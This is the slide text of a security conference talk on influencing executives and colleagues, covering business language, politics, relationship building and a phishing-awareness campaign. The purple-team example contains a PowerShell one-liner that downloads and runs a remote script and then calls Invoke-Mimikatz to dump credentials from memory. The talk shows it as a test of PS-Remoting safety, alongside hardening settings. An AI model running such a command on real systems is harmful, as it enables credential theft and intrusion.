@haydnjohnson
Communication to Upper Management & Colleagues
The Art of Influence
Whoami
Haydn Johnson
Security Manager | Purple Teamer
Points (points.com)
@haydnjohnson
Talks: Bsides, Circle City Con, SecTor, NolaCon
Kitty, Gym, BJJ
http://www.slideshare.net/HaydnJohnson
Obligatory kitty photo!
I work here!
1.
Outline
give a summary of (something).
Outline
❏ Why this talk
❏ Communication Problem
❏ Politics
❏ Influence
❏ Relationship Building
❏ Examples
2.
How | Why This Talk
Some background
A long time ago
Pentesting | Big 4 consulting
Consulting vs Internal
Consulting: weeks 1 2 3 4, then ????? (4 weeks)
Internal: Forever
What I do
Job Title: Security Manager
Responsibilities: Everything Security
❏ Threat Intelligence
❏ Network Security
❏ Security Program
❏ SDLC
❏ Logging & Monitoring
❏ Employee Security Awareness
❏ Web Security
❏ Questions ...
What I do
Number of direct reports: 0
ME
Number of Security staff: ME
In Reality
❏ Ops Team
❏ Windows Team
❏ DBA Team
❏ Sysadmins
In Short
I had to gain support from teams that had no obligation to help.
❏ No goals
❏ Security responsibility only in my Job Description
Some Struggles
I’m not a silver bullet
❏ I don’t know everything
❏ Busy
❏ Not seen as an authority figure - initially
❏ Dev experience lacking
Struggles
I'm not as technical as I thought
❏ Developers asking about websockets / encryption
“Let me do some investigation and get back to you” / aka let me Google that
Was not sure where to start
❏ I wanted to do everything
❏ So many goals
❏ Taking on too much
2.
Question Time
Audience Participation plzkthx
Which is preferred?
❏ Says hello every morning
❏ Asks how you are
❏ Remembers personal information
❏ Ensures you understand tasks
or
❏ Rushes straight to their desk
❏ Does not ask questions
❏ Micromanages
❏ Flips you an email off a list: “Can you work late tonight?”
Security has a Communication Problem
❏ Management does not care
❏ I told them X months ago but they didn’t listen
❏ Pentest was short
❏ It just does not work that way
❏ What is the boss thinking?
❏ That’s not a pentest
I still struggle with these
3.
Communication
Problem Example
Security has a Communication Problem
Pop Calc Example
Security has a Communication Problem
Kind of correct! This is what an exec thinks
Security has a Communication Problem
Consequences: Not paid, Not fixed, Sad pandas
Security has a Communication Problem
Leads to: Not aligned, Frustration, Running around
Security has a Communication Problem
What was not explained:
❏ Popping calculator is an EXAMPLE of controlling code
So what?
❏ Someone can control that computer
So what?
❏ Someone is in your network
❏ Access to Data
So what?
What could be improved?
Security has a Communication Problem
Speak their language
❏ How does this impact them?
❏ Money
❏ Reputation
❏ Down time
❏ Fines
❏ Loss of customers
Benefits
❏ Executives understand
❏ Fixing happens
❏ Less frustration for all
4.
Why is there a Communication Problem?
What’s a business?
“Different Context”
Business Context
❏ Big Wigs
❏ Hacking
❏ Profits
❏ Magic Profit (Executives)
❏ Security Costs Money
❏ Security Costs Time & Effort
❏ It Won’t Happen to Us
Basically
So what can we do?
Breaking the Status Quo
Security is seen as a Cost: Need to show how much a compromise would cost
Security is time and effort we don’t want: Amount of dollars to protect $company; Legislation; Reputation
Won’t happen to us: Statistics; News headlines; Assume Breach
If Security is seen in negative ways
How do we fix this?
How do we have an impact?
❏ Politics
❏ Influence
3.
Politics
Is just relationships
“Your Organization is MUCH more political than most of us realize.”
https://www.manager-tools.com/2012/12/rules-politics-chapter-one-count-your-votes
“Non-rational decision making”
https://www.manager-tools.com/2012/12/rules-politics-chapter-one-count-your-votes
Politics
Think of it as Relationship Effects
“Professional Life is HUMAN life, and that means it's emotional, and therefore political.”
https://www.manager-tools.com/2012/12/rules-politics-chapter-one-count-your-votes
Politics
Think of it as Relationship Effects
❏ In order to get what I want, I have to give them
what they want
❏ Give and take
How can you ‘play’ politics better?
3.
Influence
A process for having an effect
What is Influence
If someone influences someone else, they are changing a person or thing in an indirect but important way.
This way
Big 4 Example
Why Influence
❏ Reach Goals
❏ Effect change
❏ Having input that matters
❏ Being appreciated
❏ Necessary tool in organizational life
Why Influence
What could that mean for me:
❏ The extra tool you needed
❏ Career development
❏ Bigger project
❏ Exploitation
❏ Fixes approved
❏ Help from other teams
❏ Time to tune tools
❏ Changing a process
Why Influence
Most importantly
You are not doing this:
How to Influence
❏ Speak Business Language
❏ Communicate in Risk, Dollars and cents
❏ Relationship Building
How to Influence
Business Language
❏ Business Reputation
❏ Customer / Client Reputation
❏ Market and Strategy
❏ How do we stack against other companies
❏ Compliance
❏ Technology is not the driving force
How to Influence
Metrics
❏ High, Medium, Low
❏ How long does it take to remediate?
❏ What are they rated on?
How to Influence
Risks, dollars and cents
❏ What is the risk, so what?
❏ Dollar spent for each dollar protected
❏ Best practices
How to Influence
Meetings
❏ Agenda / Description
❏ Prepare beforehand
❏ Start and finish on time
If you can't present, your ideas can't be heard
https://www.manager-tools.com/2012/12/rules-politics-chapter-one-count-your-votes
3.
Relationship Building over “Zero Dayz”
Technical Skills are Fantastic
Your exploit code is amazing
Your detection algorithm is on point
Relationship Building
Tech + Soft Skills == Career zero day
❏ Networking == more opportunities
What you do and know can reach more people
What does it mean?
People Skills / Soft Skills
❏ Thinking outside the self
❏ Communicating clearly
❏ Empathy
What does that really mean?
Influence
❏ How can I get the most out of this interaction to
benefit security?
❏ How can I speak in their language?
❏ What mood are they in?
Examples - Risk Register
Risk Register
❏ Why a Risk Register?
❏ What value will it add?
❏ Speak Business
Examples - Risk Register
Risk Register
❏ To track risks, accountability
❏ Potential damage / cost / impact
❏ Metrics
Examples - Risk Register
How did I approach it
❏ Placing in Jira
I want to create this, that has a goal of...
How can you help me?
Is there a different way?
Examples - Risk Register
The result
❏ A whole workflow created in a test environment
❏ People love to help if you look at them as the expert
❏ More than just what I wanted included
❏ Things included auditability and tracking
❏ Metrics for the business
Examples - Mistakes
Admitting them
❏ Hard
❏ Necessary
❏ Cultivates a great environment
What I find works
Solutions that worked for me
Relationship Building & Influence
❏ Not claiming the sky is falling
❏ Transparency
❏ Listening for a response
Why does it work?
❏ No boy who cried wolf
❏ Integrity
❏ They will feel valued, more likely to help
Solutions that worked for me
Coffee with the CFO Example
❏ Present to CFO/CTO fortnightly
Using Fear
❏ Fear should not be the tool for security
Solutions that worked for me
Security is not just code
❏ People
❏ Process
❏ Technology
Code is written by people. Code is pushed via a process. Code is hosted on technology.
6.
Example exercise
Purple Team
PowerShell Remoting
Mimikatz
Credentials in Memory
Helpdesk / Ops wants a secure way to remotely manage workstation(s).
RDP | VNC - no thanks
Want to use PowerShell Remoting because it is easier and ‘secure’
https://blog.netspi.com/powershell-remoting-cheatsheet/
Credentials in Memory
Requirements
❏ Ease of use
❏ Secure
❏ Auditability
Research shows this is possible
Credentials in Memory
Steps:
○ Before PS-Remoting
○ After PS-Remoting
Credentials in Memory
❏ Need to know for sure
❏ Want to test that credentials are safe
❏ See for myself
This is where Mimikatz comes in
Credentials in Memory
Command Run:
powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds | Out-File pre.txt"
http://carnal0wnage.attackresearch.com/2013/10/dumping-domains-worth-of-passwords-with.html
Credentials in Memory
Dumping credentials
Compare before and after
[Thumbs-up success gif / image]
Credentials in Memory
Success!
❏ Need to document
❏ Have justification to Implement!
❏ Security Gives sign off!
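Added example, not from the talk: the WinRM and PowerShell settings a defender would put in place so the "secure" and "auditability" requirements hold before the after-PS-Remoting credential check is run. It assumes an elevated PowerShell prompt on a domain-joined Windows workstation, so Kerberos (not CredSSP or Basic) carries the authentication.

```powershell
# Added example (not the talk's own code). Run elevated on the managed workstation.
# Assumes a domain-joined host so WinRM authenticates with Kerberos.

# 1. Ease of use: enable remoting (WinRM listener + firewall rule).
Enable-PSRemoting -Force

# 2. Secure: refuse the auth modes that either delegate a reusable credential
#    to the target (CredSSP) or send it without transport protection (Basic, unencrypted).
Set-Item -Path WSMan:\localhost\Service\Auth\CredSSP  -Value $false
Set-Item -Path WSMan:\localhost\Service\Auth\Basic    -Value $false
Set-Item -Path WSMan:\localhost\Service\AllowUnencrypted -Value $false

# 3. Auditability: module logging (event 4103) and script block logging (event 4104),
#    so what Helpdesk/Ops runs over the remote session is recorded on the workstation.
$psPolicy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
New-Item -Path "$psPolicy\ScriptBlockLogging" -Force | Out-Null
Set-ItemProperty -Path "$psPolicy\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1 -Type DWord
New-Item -Path "$psPolicy\ModuleLogging\ModuleNames" -Force | Out-Null
Set-ItemProperty -Path "$psPolicy\ModuleLogging" -Name EnableModuleLogging -Value 1 -Type DWord
Set-ItemProperty -Path "$psPolicy\ModuleLogging\ModuleNames" -Name '*' -Value '*'

# 4. Verify the resulting state before taking the "after PS-Remoting" measurement.
Get-ChildItem WSMan:\localhost\Service\Auth | Select-Object Name, Value
Get-WSManCredSSP

# 5. Evidence for the comparison: remoting sessions should show up as network logons
#    (4624 with LogonType 3), the type that does not leave an interactive credential behind.
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4624 } -MaxEvents 50 |
    Where-Object { $_.Properties[8].Value -eq 3 } |
    Select-Object TimeCreated, @{ n = 'User'; e = { $_.Properties[5].Value } }
```

Step 5 is the check to pair with the before/after dumps: if the only logons on the box during the test are type 3, the credential comparison is being made under the conditions Helpdesk/Ops will actually use.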
Conclusion
Top Takeaways
We are all in this together
Soft skills will take you far
Mentoring
Questions, Comments, Ask away
Time Bonus
Phishing Awareness Campaign
Not textbook execution
❏ Was not focused on click rate or credentials
❏ Exciting - allowed rumours to spread
❏ People talked about it with each other
Phishing Awareness Campaign
Goals for $company
❏ Know to contact me for $security
❏ Have security at front of mind
❏ Understand phishing scams
Phishing - sucks
Awareness “Training”
All the lolcats
Everyone can be phished, even me
Phishing Awareness Campaign
Training was not training
❏ 30min awareness session
❏ Lolcats & jokes
❏ Graphs for team results
Phishing Awareness Campaign
Visibility as Security
❏ Everyone knew my name
❏ People approached me with their story
Communication hack fest-2018-final